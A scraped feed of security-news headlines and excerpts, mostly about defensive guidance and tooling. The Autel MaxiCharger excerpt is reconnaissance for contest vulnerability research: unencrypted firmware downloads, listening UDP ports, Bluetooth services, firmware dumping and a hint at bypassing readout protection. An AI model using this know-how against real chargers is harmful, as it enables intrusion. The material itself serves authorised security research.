The executive order covers multiple other areas. To get all the details and expert analysis, read our blog “New Cybersecurity Executive Order: What It Means for Federal Agencies” from Robert Huber, Tenable’s Chief Security Officer, Head of Research and President of Tenable Public Sector.

4 - CISA publishes secure software development best practices
Software makers interested in improving the security of their development process and of their products have fresh guidance to peruse.

As part of its “Secure by Design” program, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published cybersecurity recommendations for protecting organizations’ software development lifecycle.

The best practices are organized into two categories — Software development process goals; and Product design goals — and include:

Software development process goals:
- Address vulnerabilities before releasing the software product, and publish a vulnerability disclosure policy.
- Separate all software development environments, including development, build and test, to reduce the lateral movement risk.
- Enforce multi-factor authentication across all software development environments.
- Securely store and transmit credentials.

Product design goals:
- Reduce entire classes of preventable vulnerabilities, such as SQL injection vulnerabilities, memory safety vulnerabilities and cross-site scripting vulnerabilities.
- Provide timely security patches to customers.
- Don’t use default password in your products.
- Let users know when your products are nearing end-of-life status and you will no longer provide security patches for them.

The recommendations “will help to protect the sector from cyber incidents, identify and address vulnerabilities prior to product release, improve incident response, and significantly improve software security,” reads a CISA statement.

To get more details, read the full “Information Technology (IT) Sector-Specific Goals (SSGs)” fact sheet.

For more information about secure software development:
- “CISA Tells Tech Vendors To Squash Command Injection Bugs, as OpenSSF Calls on Developers To Boost Security Skills” (Tenable)
- “Secure Development” (Software Engineering Institute, Carnegie Mellon Univ.)
- “Secure Software Development Framework” (NIST)
- “Secure development and deployment guidance” (UK NCSC)
- “OWASP Developer Guide” (Open Worldwide Application Security Project)

5 - U.S. gov’t launches security label for IoT products
To encourage the development of safer internet of things (IoT) devices for consumers, the U.S. government has introduced a new label for IoT products that meet National Institute of Standards and Technology (NIST) cybersecurity standards.

Called the U.S. Cyber Trust Mark, the label will also help U.S. consumers know which IoT products are more secure, as they shop for internet-connected ware, such as baby monitors, security cameras, refrigerators, garage door openers and thermostats.

“These devices are part of Americans’ daily lives. But Americans are worried about the rise of criminals remotely hacking into home security systems to unlock doors, or malicious attackers tapping into insecure home cameras to illicitly record conversations,” reads a White House statement.

IoT manufacturers will soon be able to seek the U.S. Cyber Trust Mark label by submitting their IoT products to accredited labs for testing. Tests will cover areas including password authentication, data protection, software updates and incident detection. IoT products that earn the label will also have a QR code that’ll link consumers to information such as:
- How to change default passwords
- How to configure the device securely
- How to access software updates and patches if they’re not delivered automatically
- The end date of the product’s support period

Participation in the U.S. Cyber Trust Mark program is voluntary for IoT manufacturers. IoT devices excluded from the program include motor vehicles, medical devices, and products used for manufacturing, industrial control and enterprise applications.

To get more details, visit the U.S.
Cyber Trust Mark home page.For more information about securing consumer IoT devices, check out resources from the IoT Security Foundation; the European Telecommunications Standards Institute; TechAccord; Internet Society; the U.K. National Cyber Security Centre; and the International Organization for Standardization (ISO). 6 - U.S. gov’t seeks tougher cybersecurity rules for health providersDoctors, hospitals, health insurers and other healthcare organizations may face stricter cybersecurity regulations in the U.S.That’s because the U.S. government is seeking to tighten the cybersecurity requirements in the Health Insurance Portability and Accountability Act (HIPAA).The new cybersecurity rules proposed by the Department of Health and Human Services (HHS) include:Develop and revise on an ongoing basis a technology asset inventory and a network map that illustrates the movement of electronic protected health information (ePHI) throughout the organization’s electronic information systems.Make risk analysis more specific by submitting written assessments that include:A review of the technology asset inventory and network mapReasonably anticipated threats to ePHI’s confidentiality, availability and integrityPotential vulnerabilities to the organization’s electronic information systemsA risk-level assessment of identified threats and vulnerabilitiesStrengthen contingency planning and security incident response with steps including:Draft written plans to restore certain electronic information systems and data within 72 hours.Prioritize restoration by analyzing criticality of systems and tech assets.Outline in writing how employees and the organization will respond to known or suspected security incidents.Conduct an audit at least once per year to ensure the organization’s compliance with HIPAA’s cybersecurity rules.With limited exceptions, encrypt ePHI at rest and in transit and require the use of multi-factor authentication.Conduct vulnerability scanning at least every 
six months, and penetration testing at least once a year.For more details about HHS’ new proposed HIPAA cybersecurity rules and to submit public comments about them, go to the Federal Register’s “HIPAA Security Rule To Strengthen the Cybersecurity of Electronic Protected Health Information” page. The comment period ends on March 7, 2025.
by Tenable
2025-01-17 06:58:35
BlackSuit Ransomware Group: What Has Changed After Royal Ransomware
The BlackSuit ransomware group, a successor to the infamous Royal ransomware, has rapidly established itself as a prominent cyber threat since its emergence in mid-2023. Leveraging advanced tactics, techniques, and procedures (TTPs), BlackSuit employs a multifaceted approach that includes phishing, RDP exploitation, and double extortion to target high-value organizations worldwide. With over $500 million in ransom demands and attacks on industries ranging from education to automotive, BlackSuit showcases evolving ransomware capabilities.
by Picus Security
2025-01-17 04:00:00
Russian APT Phishes Kazakh Gov't for Strategic Intel
A highly targeted cyber-intelligence campaign adds fuel to the increasingly complex relationship between the two former Soviet states.
by Dark Reading
2025-01-17 02:18:00
The complete list of Q4 2024 releases and updates on HTB Enterprise Platform
Building on the feedback from our 3.2M+ cybersecurity professionals and addressing industry challenges, we’re thrilled to share the latest Hack The Box updates from the past three months!
by Hack The Box Blog
2025-01-17 00:30:13
Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated Jan. 17)
CVE-2025-0282 and CVE-2025-0283 affect multiple Ivanti products. This threat brief covers attack scope, including details from an incident response case. The post Threat Brief: CVE-2025-0282 and CVE-2025-0283 (Updated Jan. 17) appeared first on Unit 42.
by Palo Alto Networks - Unit42
2025-01-17 00:14:45
Hackers Likely Stole FBI Call Logs From AT&T That Could Compromise Informants
A breach of AT&T that exposed “nearly all” of the company’s customers may have included records related to confidential FBI sources, potentially explaining the bureau’s new embrace of end-to-end encryption.
by WIRED Security News
2025-01-16 23:52:14
Biden's Cybersecurity EO Leaves Trump a Comprehensive Blueprint for Defense
New order mandates securing the federal software supply chain and communications networks, as well as deploying AI tools to protect critical infrastructure from cyberattacks — but will the Trump administration follow through?
by Dark Reading
2025-01-16 23:42:00
Russian Star Blizzard Targets WhatsApp Accounts in New Spear-Phishing Campaign
The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. "Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations
by The Hacker News
2025-01-16 22:03:05
183M Patient Records Exposed: Fortified Health Security Releases 2025 Healthcare Cybersecurity Report
by Dark Reading
2025-01-16 21:36:00
CISA and US and International Partners Publish Guidance for OT Owners and Operators
by Dark Reading
2025-01-16 21:35:17
Reimagining Your SOC: How to Achieve Proactive Network Security
This blog post advises on how security teams can move to autonomous detection and investigation of novel threats, reducing alert fatigue, and enabling tailored, real-time threat response.
by Darktrace
2025-01-16 21:32:14
SEALSQ in Cooperation With WISeKey Expands Post-Quantum Footprint in Saudi Arabia
by Dark Reading
2025-01-16 21:18:48
Chinese Innovations Spawn Wave of Toll Phishing Via SMS
Residents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid. Researchers say the surge in SMS spam coincides with new features added to a popular commercial phishing kit sold in China that makes it simple to set up convincing lures spoofing toll road operators in multiple U.S. states.
by Krebs on Security
2025-01-16 21:14:20
FTC Orders GoDaddy to Fix Inadequate Security Practices
The FTC claims that the Web hosting company's security failures led to several major breaches in the past few years.
by Dark Reading
2025-01-16 19:15:38
Find the helpers
Bill discusses how to find 'the helpers' and the importance of knowledge sharing. Plus, there's a lot to talk about in our latest vulnerability roundup.
by Cisco Talos Blog
2025-01-16 19:00:00
How to protect your site from subdomain takeover
Subdomain takeover is a serious risk for organizations with a large online presence (which is a lot of businesses in 2025!). A domain name is the starting point of your company’s online identity, encompassing the main and subsidiary websites—serving as the organization’s business card, storefront, and a central hub for commercial activities. For SaaS providers […] The post How to protect your site from subdomain takeover appeared first on Outpost24.
by Outpost24
2025-01-16 18:09:54
Extending Falco for Box
Box, Inc. specialises in developing and marketing cloud-based content management, collaboration, and file-sharing tools for businesses. While Box’s services are... The post Extending Falco for Box appeared first on Sysdig.
by Sysdig
2025-01-16 17:56:45
Updated Response to CISA Advisory (AA23-136A): #StopRansomware: BianLian Ransomware Group
AttackIQ has released an updated attack graph in response to the recently revised CISA Advisory (AA23-136A) that disseminates known BianLian ransomware group Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) identified through the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA) and the Australian Cyber Security Centre (ACSC) investigations. The post Updated Response to CISA Advisory (AA23-136A): #StopRansomware: BianLian Ransomware Group appeared first on AttackIQ.
by AttackIQ
2025-01-16 17:55:00
Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action
The digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle. Traditional trust management? Forget it. It's simply not built for today's fast-paced, hybrid environments. You need a
by The Hacker News
2025-01-16 17:48:07
White House Executive Order: Strengthening and Promoting Innovation in the Nation’s Cybersecurity
Get details on this new cybersecurity Executive Order and its implications.
by Legit Security
2025-01-16 17:42:13
Agentic AI Paves the Way for Sophisticated Cyberattacks
Gartner analysts discuss how agentic AI will transform business operations by 2028, while also raising the risk of cyberattacks.
by ITPro Today
2025-01-16 17:00:02
Gootloader inside out
Open-source intelligence reveals the server-side code of this pernicious SEO-driven malware - without needing a lawyer afterward
by Sophos News
2025-01-16 17:00:00
The $10 Cyber Threat Responsible for the Biggest Breaches of 2024
You can tell the story of the current state of stolen credential-based attacks in three numbers: Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon). Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user (Source: Forrester). Stolen credentials on criminal forums cost as
by The Hacker News
2025-01-16 16:53:00
New UEFI Secure Boot Vulnerability Could Allow Attackers to Load Malicious Bootkits
Details have emerged about a now-patched security vulnerability that could allow a bypass of the Secure Boot mechanism in Unified Extensible Firmware Interface (UEFI) systems. The vulnerability, assigned the CVE identifier CVE-2024-7344 (CVSS score: 6.7), resides in a UEFI application signed by Microsoft's "Microsoft Corporation UEFI CA 2011" third-party UEFI certificate, according to a new
by The Hacker News
2025-01-16 16:50:00
Researchers Find Exploit Allowing NTLMv1 Despite Active Directory Restrictions
Cybersecurity researchers have found that the Microsoft Active Directory Group Policy that's designed to disable NT LAN Manager (NTLM) v1 can be trivially bypassed by a misconfiguration. "A simple misconfiguration in on-premise applications can override the Group Policy, effectively negating the Group Policy designed to stop NTLMv1 authentications," Silverfort researcher Dor Segal said in a
by The Hacker News
2025-01-16 16:45:00
Hackers Hide Malware in Images to Deploy VIP Keylogger and 0bj3ctivity Stealer
Threat actors have been observed concealing malicious code in images to deliver malware such as VIP Keylogger and 0bj3ctivity Stealer as part of separate campaigns. "In both campaigns, attackers hid malicious code in images they uploaded to archive[.]org, a file-hosting website, and used the same .NET loader to install their final payloads," HP Wolf Security said in its Threat Insights Report
by The Hacker News
2025-01-16 16:38:42
What Lies Ahead for the Global BPO Sector in 2025?
Businesses are turning to innovative BPO strategies powered by AI, automation, and data-driven insights to streamline operations, reduce costs, and deliver personalized customer experiences in 2025.
by ITPro Today
2025-01-16 16:17:45
Essential PowerShell Commands: A Cheat Sheet for Beginners
This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.
Introduction to PowerShell. What Is PowerShell? PowerShell is a powerful command-line shell that supports scripting languages and provides tools for managing computer resources locally and remotely. Benefits of PowerShell for Windows Administration: Windows PowerShell commands enable automation of repetitive tasks such as managing users, services, files, or scripts. PowerShell can also be used for managing … Continued
by Netwrix
2025-01-16 16:11:41
Introduction to PowerShell Invoke-Command
This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.
The Invoke-Command cmdlet in PowerShell enables IT admins to execute commands and scripts on remote machines, and even to redirect the output of those remote scripts to their own console. As a result, they can manage multiple machines from a central location. Key use cases include: Invoke-Command offers all of the following valuable capabilities: Benefits … Continued
by Netwrix
2025-01-16 16:03:00
Russia’s Star Blizzard pivots to WhatsApp in spear-phishing campaign
by ComputerWeekly
2025-01-16 16:00:00
Reviewing the Attack Surface of the Autel MaxiCharger: Part Two
Previously, we covered the internals of the Autel MaxiCharger where we highlighted each of the main components. In this post, we aim to outline the attack surface of the MaxiCharger in the hopes of providing inspiration for vulnerability research.

All information has been obtained through reverse engineering, experimenting, and combing through the Autel MaxiCharger manual (PDF).

At the time of writing the following software versions were applicable:
· Autel Charge app v3.0.7
· Autel Config app v2.1.0
· Autel MaxiCharger modules:
  · Charge Control v1.36.00
  · Power Control v1.21.00
  · LCD Control v0.99.31
  · LCD Information v0.99.08
  · LCD Resources v0.99.08
  · LCD Languages v0.04.04

Mobile Applications

Autel has published two mobile applications for both Android and iOS. The main app is called Autel Charge and contains functionality intended for end users. Some of the features include:
· Defining charging schedules
· Load balancing
· Providing Wi-Fi credentials for the charger to use
· Forcing firmware updates
· OCPP server selection (including custom servers)
· Current limiting
· Finding other chargers on a map
· Checking charger version information

Upon loading the app on a rooted Android device a superuser request can be seen. This was unexpected and points towards the app employing anti-reversing measures. Denying the request loads the app normally.

Figure 1: Autel Charge superuser request

After denying the superuser request a new Autel account can be created using an email address.

The second app is named Autel Config and allows installers / technicians to configure chargers and manage tickets. Unlike the Autel Charge app, there is no option to register for an account and providing Autel Charge account credentials doesn't work. This suggests that installers / technicians have some other way of obtaining valid credentials.

Further research into these apps could be valuable to better understand how the apps and charger communicate.

Network Traffic Analysis

Using the Autel Charge app the MaxiCharger was configured to connect to a researcher controlled Wi-Fi network in order to monitor the network traffic. The app and charger were then left idling whilst the traffic was captured. A few DNS requests were sent out from the charger (192.168.200.66) for Autel related infrastructure.

Figure 2: Charger DNS queries

The first query was for gateway-eneprodus.autel.com which is an alias of eneprodus-alb-internet-2014464356.us-west-2.elb.amazonaws.com. This resolved to the following IP addresses (shown in the order received):
• 54.185.127.160
• 52.36.153.97
• 44.240.206.177
• 34.215.58.124

Straight after the first DNS query response a TLS session was set up and encrypted data was sent by the charger on port 443 to 54.185.127.160. Data was sent back and forth between the charger and server a few times before another DNS query was sent. The charger issued another query for gateway-eneprodus.autel.com which, as before, is an alias and returned the same IP addresses but in a different order, presumably due to load balancing. This time the DNS query returned the IP addresses:
• 34.215.58.124
• 44.240.206.177
• 54.185.127.160
• 52.36.153.97

Like previously, the charger used the first IP address that was returned but this time no TLS session was set up. Plain HTTP was used.

Figure 3: HTTP traffic

Looking a bit closer showed the charger periodically sending log data to the Autel server. The server always responded with JSON that had a null data value, a 200 code value and a message value of OK.

Figure 4: HTTP POST traffic

After a while the charger made another DNS request for gateway-eneprodus.autel.com, this time the 44.240.206.177 IP address was returned first. The charger then sent an HTTP POST to /api/app-version-manager/version/upgrade/ota with device related details such as the serial number and current firmware version. The server responded with JSON containing firmware update related information including a URL to download the latest version.

Figure 5: HTTP firmware related traffic

The charger then proceeded to send a DNS request for s3.us-west-2.amazonaws.com and directly downloaded the firmware update over HTTP. The same pattern was observed multiple times as the device downloaded firmware updates for each of its modules. A list of these modules and their versions can be viewed in the Autel Charge app by navigating to the Charger Info page.

Figure 6: MaxiCharger module versions

After the firmware was updated and the charger rebooted no further HTTP traffic was observed to the logging or firmware update endpoint; instead only HTTPS was used.

Port scanning the charger over Wi-Fi showed no open TCP or UDP ports, however UDP ports 6000 and 6666 appear to be listening over the Ethernet interface. The Ethernet interface is a valid target for the competition so these 2 listening services may be worth researching further.

Bluetooth Low Energy

By default the MaxiCharger uses the device serial number as the device name when advertising over Bluetooth. Once connected there are 4 available services that offer a total of 14 characteristics. Autel Charge uses these endpoints to communicate with the charger. A dump of each service and associated characteristics is shown below. Further research into Autel Charge and Autel Config will likely assist in understanding the Bluetooth services better.

Firmware

As mentioned in the previous blog the main microcontroller has readout protection enabled, however this can be bypassed using techniques covered in Jonathan Andersson's and Thanos Kaliyanakis' Blackhat EU talk. Keep an eye out for future blog posts that will cover these techniques. One of which doesn't require glitching!

The main firmware can also be acquired by sniffing the charger update process (as described in the Network Traffic Analysis section) or by reversing the app to figure out the download URLs. The firmware of the ESP32 WROOM 32D module can be dumped using the standard esptool.py from Espressif. During research it was noted that esptool.py would sometimes fail to dump the full firmware image. To mitigate this the firmware can be dumped in smaller chunks and then stitched back together into a single blob.

Other Potential Attack Surfaces

There are a few other attack surfaces that are considered in scope and are worth mentioning. One of these is the undocumented USB C port that can be found behind a small panel on the side of the unit. There is no publicly available information about what this USB port is used for.

Also, next to the USB port is the SIM card tray. Attacks that utilize a SIM card are also considered to be in scope.

And finally, there is the RFID (NFC) reader.

Summary

Hopefully this blog post provides enough information to kickstart vulnerability research against the Autel MaxiCharger. We are looking forward to Pwn2Own Automotive again in Tokyo in January 2025 at Automotive World, and we will see if IVI vendors have improved their product security. Don’t wait until the last minute to ask questions and register! We hope to see you there.

You can find me on Twitter at @ByteInsight, and follow the team on Twitter, Mastodon, LinkedIn, or Bluesky for the latest in exploit techniques and security patches.
by Zero Day Initiative Blog
2025-01-16 15:47:22
The best password manager for families in 2025: Expert tested and reviewed
The best password managers provide security, privacy, and ease of use for a reasonable price. We tested the best ones to help you find what's best for your family.
by ZDNET Security
2025-01-16 15:10:52
Avery had credit card skimmer stuck on its site for months
Avery has confirmed its website was compromised by a credit card skimmer that potentially affected over 60,000 customers.
by Malwarebytes Labs
2025-01-16 15:00:00
One Active Directory Account Can Be Your Best Early Warning
Here we go again, discussing Active Directory, hacking, and detection engineering. tl;dr: One AD account can provide you with three detections that if implemented properly will catch common adversarial activities […] The post One Active Directory Account Can Be Your Best Early Warning appeared first on Black Hills Information Security.
by Black Hills Information Security
2025-01-16 15:00:00
Strategic Approaches to Threat Detection, Investigation & Response
By staying vigilant, agile, and prepared, organizations can turn TDIR from a defensive strategy into a proactive enabler of security and operational excellence.
by Dark Reading
2025-01-16 14:29:59
Risk, Reputational Scores Enjoy Mixed Success as Security Tools
Part predictive analysis, part intuition, risk and reputation services are imperfect instruments at best — and better than nothing for most organizations and insurers.
by Dark Reading
2025-01-16 14:10:00
The SOC case files: XDR’s automated threat response delivers high speed protection to an employee in the cloud
An employee at a telecommunications company connected as usual to their cloud account. They then appeared to travel a distance of 361 km, roughly 225 miles, at nearly twice the speed of sound before logging in again.
by Barracuda
2025-01-16 14:06:00
OSV-SCALIBR: A library for Software Composition Analysis
Posted by Erik Varga, Vulnerability Management, and Rex Pan, Open Source Security Team

In December 2022, we announced OSV-Scanner, a tool to enable developers to easily scan for vulnerabilities in their open source dependencies. Together with the open source community, we’ve continued to build this tool, adding remediation features, as well as expanding ecosystem support to 11 programming languages and 20 package manager formats.

Today, we’re excited to release OSV-SCALIBR (Software Composition Analysis LIBRary), an extensible library for SCA and file system scanning. OSV-SCALIBR combines Google’s internal vulnerability management expertise into one scanning library with significant new capabilities such as:
- SCA for installed packages, standalone binaries, as well as source code
- OS package scanning on Linux (COS, Debian, Ubuntu, RHEL, and much more), Windows, and Mac
- Artifact and lockfile scanning in major language ecosystems (Go, Java, Javascript, Python, Ruby, and much more)
- Vulnerability scanning tools such as weak credential detectors for Linux, Windows, and Mac
- SBOM generation in SPDX and CycloneDX, the two most popular document formats
- Optimization for on-host scanning of resource constrained environments where performance and low resource consumption is critical

OSV-SCALIBR is now the primary SCA engine used within Google for live hosts, code repos, and containers. It’s been used and tested extensively across many different products and internal tools to help generate SBOMs, find vulnerabilities, and help protect our users’ data at Google scale.

We offer OSV-SCALIBR primarily as an open source Go library today, and we're working on adding its new capabilities into OSV-Scanner as the primary CLI interface.

Using OSV-SCALIBR as a library

All of OSV-SCALIBR's capabilities are modularized into plugins for software extraction and vulnerability detection which are very simple to expand.

You can use OSV-SCALIBR as a library to:

1. Generate SBOMs from the build artifacts and code repos on your live host:

    import (
        "context"

        "github.com/google/osv-scalibr"
        "github.com/google/osv-scalibr/converter"
        "github.com/google/osv-scalibr/extractor/filesystem/list"
        "github.com/google/osv-scalibr/fs"
        "github.com/google/osv-scalibr/plugin"
        spdx "github.com/spdx/tools-golang/spdx/v2/v2_3"
    )

    // GenSBOM scans the live host's root filesystem with every filesystem
    // extractor that supports Linux and converts the result to SPDX 2.3.
    func GenSBOM(ctx context.Context) *spdx.Document {
        capab := &plugin.Capabilities{OS: plugin.OSLinux}
        cfg := &scalibr.ScanConfig{
            ScanRoots:            fs.RealFSScanRoots("/"),
            FilesystemExtractors: list.FromCapabilities(capab),
            Capabilities:         capab,
        }
        result := scalibr.New().Scan(ctx, cfg)
        return converter.ToSPDX23(result, converter.SPDXConfig{})
    }

2. Scan a git repo for SBOMs:

Simply replace "/" with the path to your git repo. Also take a look at the various language extractors to enable for code scanning.

3. Scan a remote container for SBOMs:

Replace the scan config from the above code snippet with

    import (
        ...
        "github.com/google/go-containerregistry/pkg/authn"
        "github.com/google/go-containerregistry/pkg/v1/remote"
        "github.com/google/osv-scalibr/artifact/image"
        ...
    )
    ...
    // Pull the image layers from the registry and expose them as a filesystem
    // that the scanner can walk (the error return is worth checking in real code).
    filesys, _ := image.NewFromRemoteName(
        "alpine:latest",
        remote.WithAuthFromKeychain(authn.DefaultKeychain),
    )
    cfg := &scalibr.ScanConfig{
        ScanRoots: []*fs.ScanRoot{{FS: filesys}},
        ...
    }

4. Find vulnerabilities on your filesystem or a remote container:

Extract the PURLs from the SCALIBR inventory results from the previous steps:

    import (
        ...
        "github.com/google/osv-scalibr/converter"
        ...
    )
    ...
    result := scalibr.New().Scan(ctx, cfg)
    // One package URL per discovered inventory entry.
    for _, i := range result.Inventories {
        fmt.Println(converter.ToPURL(i))
    }

And send them to osv.dev, e.g.

    $ curl -d '{"package": {"purl": "pkg:npm/dojo@1.2.3"}}' "https://api.osv.dev/v1/query"

See the usage docs for more details.

OSV-Scanner + OSV-SCALIBR

Users looking for an out-of-the-box vulnerability scanning CLI tool should check out OSV-Scanner, which already provides comprehensive language package scanning capabilities using much of the same extraction as OSV-SCALIBR. Some of OSV-SCALIBR’s capabilities are not yet available in OSV-Scanner, but we’re currently working on integrating OSV-SCALIBR more deeply into OSV-Scanner. This will make more and more of OSV-SCALIBR’s capabilities available in OSV-Scanner in the next few months, including installed package extraction, weak credentials scanning, SBOM generation, and more.

Look out soon for an announcement of OSV-Scanner V2 with many of these new features available. OSV-Scanner will become the primary frontend to the OSV-SCALIBR library for users who require a CLI interface. Existing users of OSV-Scanner can continue to use the tool the same way, with backwards compatibility maintained for all existing use cases. For installation and usage instructions, have a look at OSV-Scanner’s documentation here.

What’s next

In addition to making all of OSV-SCALIBR’s features available in OSV-Scanner, we're also working on additional new capabilities. Here are some of the things you can expect:
- Support for more OS and language ecosystems, both for regular extraction and for Guided Remediation
- Layer attribution and base image identification for container scanning
- Reachability analysis to reduce false positive vulnerability matches
- More vulnerability and misconfiguration detectors for Windows
- More weak credentials detectors

We hope that this library helps developers and organizations to secure their software and encourages the open source community to contribute back by sharing new plugins on top of OSV-SCALIBR.

If you have any questions or if you would like to contribute, don't hesitate to reach out to us at osv-discuss@google.com or by posting an issue in our issue tracker.
by Google Security Blog
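Step 4 of the OSV-SCALIBR post above ends with one curl call per PURL. An added example, not code from the post or from the OSV-SCALIBR project: this standard-library Go program collects the PURLs that converter.ToPURL prints into a single osv.dev /v1/querybatch request and maps the reply back onto each package by index, refusing to proceed when the result count does not match the query count. The batch endpoint and the reply layout (results[i].vulns[].id answers queries[i]) are osv.dev's documented API; the pkg:pypi PURL and the GHSA-EXAMPLE-0001 id in the embedded sample reply are constructed placeholders.

```go
// Added example (not OSV-SCALIBR or OSV-Scanner code): batch the PURLs that
// converter.ToPURL prints into a single osv.dev /v1/querybatch request body
// and map the reply back onto each PURL. Standard library only.
package main

import (
	"encoding/json"
	"fmt"
	"strings"
)

// OSVBatchURL is osv.dev's batch endpoint: POST the body from BuildBatchRequest
// here instead of one /v1/query call per package.
const OSVBatchURL = "https://api.osv.dev/v1/querybatch"

// Request: {"queries":[{"package":{"purl":"..."}}, ...]}
// Reply (only the fields used here): results[i] answers queries[i]; an empty
// object means no known vulnerabilities for that package.
type (
	packageRef    struct{ PURL string `json:"purl"` }
	query         struct{ Package packageRef `json:"package"` }
	batchRequest  struct{ Queries []query `json:"queries"` }
	vuln          struct{ ID string `json:"id"` }
	batchResult   struct{ Vulns []vuln `json:"vulns"` }
	batchResponse struct{ Results []batchResult `json:"results"` }
)

// BuildBatchRequest turns PURL strings into the JSON body for /v1/querybatch.
// Blank and duplicate PURLs are dropped; the returned slice lists the PURLs
// actually queried, in order, so results can be re-attached by index.
func BuildBatchRequest(purls []string) ([]byte, []string, error) {
	seen := make(map[string]bool)
	var req batchRequest
	var kept []string
	for _, p := range purls {
		p = strings.TrimSpace(p)
		if p == "" || seen[p] {
			continue
		}
		seen[p] = true
		req.Queries = append(req.Queries, query{Package: packageRef{PURL: p}})
		kept = append(kept, p)
	}
	body, err := json.Marshal(req)
	return body, kept, err
}

// MapVulns pairs each queried PURL with the vulnerability IDs returned for it.
// A result count that differs from the query count is an error: silently
// zipping misaligned slices would attribute findings to the wrong package.
func MapVulns(kept []string, respBody []byte) (map[string][]string, error) {
	var resp batchResponse
	if err := json.Unmarshal(respBody, &resp); err != nil {
		return nil, fmt.Errorf("decode osv.dev reply: %w", err)
	}
	if len(resp.Results) != len(kept) {
		return nil, fmt.Errorf("osv.dev returned %d results for %d queries",
			len(resp.Results), len(kept))
	}
	out := make(map[string][]string, len(kept))
	for i, r := range resp.Results {
		ids := []string{}
		for _, v := range r.Vulns {
			ids = append(ids, v.ID)
		}
		out[kept[i]] = ids
	}
	return out, nil
}

// SampleResponse is a constructed osv.dev reply for two queries: the first
// package has one (placeholder) advisory, the second has none.
const SampleResponse = `{"results":[{"vulns":[{"id":"GHSA-EXAMPLE-0001"}]},{}]}`

func main() {
	// PURLs as converter.ToPURL prints them: the first is the post's own curl
	// example, the second is constructed, and the duplicate shows de-duplication.
	body, kept, err := BuildBatchRequest([]string{"pkg:npm/dojo@1.2.3", "pkg:pypi/example-pkg@1.0.0", "pkg:npm/dojo@1.2.3"})
	if err != nil {
		panic(err)
	}
	fmt.Printf("POST %s\n%s\n", OSVBatchURL, body)
	findings, err := MapVulns(kept, []byte(SampleResponse)) // offline stand-in for the live reply
	if err != nil {
		panic(err)
	}
	fmt.Println(findings)
}
```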
2025-01-16 14:01:17
Clop ransomware gang names dozens of victims hit by Cleo mass-hack, but several firms dispute breaches
The Russia-linked ransomware group is threatening to leak data stolen from almost 60 Cleo Software customers if ransoms aren't paid.
by TechCrunch
2025-01-16 14:00:10
New Possibilities with Purple AI | Third-Party Log Sources & Multilingual Question Support
Learn about the all-new third-party log sources and multilingual question support features just released for SentinelOne's Purple AI.
by SentinelOne
2025-01-16 14:00:00
The current state of ransomware: Weaponizing disclosure rules and more
As we near the end of 2024, ransomware remains a dominant and evolving threat against any organization. Cyber criminals are more sophisticated and creative than ever. They integrate new technologies, leverage geopolitical tensions and even use legal regulations to their advantage. What once seemed like a disruptive but relatively straightforward crime has evolved into a […]
by Security Intelligence
2025-01-16 13:30:27
Resurrecting Shift-Left With Human-in-the-loop AI
Alex Rice, Thu, 01/16/2025 - 10:28

What's Needed for Secure by Design Success
We spent years studying why “shift-left” controls fail in order to identify the principles they need to succeed. Success starts with a developer-first foundation and a discipline of eliminating work rather than creating it.

The Developer-first Application Security Foundation
To guide developers to write secure code, they need to be armed with actionable information; in fact, use “actionable” interchangeably with “useful.” The key ingredients of actionability are context, speed, and low-noise output: the tooling needs to be focused, fast, and able to understand what is being analyzed. Static Application Security Testing (SAST) and Software Composition Analysis (SCA) tools are fast but fall short on context and noise. The problem is how often they are wrong, bombarding developers with false positives and duplicate warnings.

The source of information needs to learn continuously. A process is doomed to fail if developers must constantly explain their work and escalate exceptions. Developer security tools need to listen, watch, and adapt without intervention. If application security listens to developers and provides value, developers respond by listening and learning in return.

When application security activates in development, it should be non-blocking. Blocking mechanisms bring development, and everything else, to a halt; they incentivize creative bypasses, not secure code. Applying preventative safeguards is important, but overburdening developers simply because they work on the pre-production side of the SDLC is hardly a balanced defense-in-depth strategy.

Finally, security can't just make noise at developers. Remediation needs to be part of the solution: to address the issues that arise, there needs to be interactive support throughout the lifecycle.

Where “Shift Left” Went Wrong
Efforts to introduce security testing earlier in the SDLC usually begin by applying SAST (and IAST, DAST, SCA, RASP, etc.) scanners. These are fast and, because of broad compatibility with most programming languages, theoretically scalable. The problem is the work it takes to prove their output right or wrong, which leads to compounding backlogs. And on examination they are often wrong, leading to security policies developers don't trust. This is where application security in development stalls: trying to make a dysfunctional policy work while security debt grows.

None of this is to say security code scanners aren't powerful and valuable. Their maintainers, whose work has done the world a great service, never claimed they should stand as a single strategy. “Shift left” failed developers as a well-intended, unspoken hope that there would be an easy fix to a hard problem.

The Future of Developer Security with AI
Scanners are limited when it comes to understanding massive legacy codebases, identifying misuse of functionality in microservice architectures, and finding flaws that stem from code that was never written, such as a missing control. Here AI shines and the future looks bright. Models trained on large corpora are capable of analyzing entire codebases, and secure-code systems built on them can flag areas that deviate from normal patterns. That is great news for developers and security engineers who have carried 100% of the manual secure code review burden for years.

Is AI alone the solution to right what “shift left” got wrong? Embarking on the opportunities AI makes possible, it is important to remember that technology is a tool, not a replacement for invaluable human expertise.

Human-AI Collaboration
Rethinking “shift-left” security strategy by incorporating AI is exciting, but warrants safe and responsible exploration. Deploying it requires human-in-the-loop (HITL) oversight as a governing principle. Conventionally, the objective of a HITL methodology is to improve the models it oversees, ensuring AI systems are accurate, robust, ethical, adaptable, and aligned with real-world goals.

Let's challenge conventional thinking. Instead of prioritizing the efficacy of AI systems, what if human-in-the-loop oversight began and ended with helping a developer write secure code? What if human experts could not only categorize model output as “right” or “wrong,” but expand on what is “right” so it is actionable with all of the contextual details taken into account? What if they were a teammate who can help a developer on the problem-solving journey of taking action to remediate?

